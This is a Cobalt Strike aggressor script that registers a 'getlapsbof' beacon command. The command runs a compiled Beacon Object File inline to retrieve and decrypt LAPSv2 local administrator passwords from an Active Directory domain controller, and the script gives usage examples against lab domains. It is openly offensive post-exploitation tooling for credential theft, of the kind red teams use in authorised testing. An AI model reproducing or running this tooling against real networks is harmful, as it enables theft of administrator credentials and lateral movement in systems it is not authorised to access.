# getlapsbof
# version: 1.3
# Author: @SavSanta 
# Original Credit: @xpn
# Decrypt LAPSv2 Credentials

beacon_command_register("getlapsbof", "getlapsbof version 1.2 - Decrypts LAPSv2 Credentials", "getlapsbof \c4<TARGET_DC>\o \c2<BASE_DN>\o \c7<TARGET_COMPUTER_DN>\o

Retrieve and Decrypt the the LAPSv2 password from the Windows Active Directory Domain Controller.

Requirements:
LDAP Connectivity
Account with adequate privileges to read the password.

Caveat:
LAPSv1 (aka Legacy LAPS) not supported.

Exampled:
getlapsbof \c4192.168.230.150\o \c2DC=sandstone,DC=camp\o \c7CN=edworkbox1,OU=LAPSManaged,DC=sandstone,DC=camp\o
getlapsbof \c4sandstone.camp\o \c2DC=sandstone,DC=camp\o \c7CN=edworkbox1,OU=LAPSManaged,DC=sandstone,DC=camp\o
getlapsbof \c4DC01.LAB.LOCAL\o \c2DC=LAB,DC=LOCAL\o \c7CN=COMPUTERACC,OU=LAPSENABLED,DC=LAB,DC=LOCAL\o
")


alias getlapsbof {
    local('$barch $handle $data $args');

    if(size(@_) < 2)
    {
        berror($1, beacon_command_detail("getlapsbof"));
        return;
    }
    
    $barch  = barch($1);
    
    $handle = openf(script_resource("dist/getlapsbof. $+ $barch $+ .o"));
    $data   = readb($handle, -1);
    closef($handle);
    
    $server = $2;
    $dn = $3;
    $dnobject = $4;
    $args = bof_pack($1, "zzz", $server, $dn, $dnobject);
    
    btask($1, "Target DC: $server");
    btask($1, "Target Base DN: $dn");
    btask($1, "Target Computer DN: $dnobject");
    
    beacon_inline_execute($1, $data, "go", $args);
}
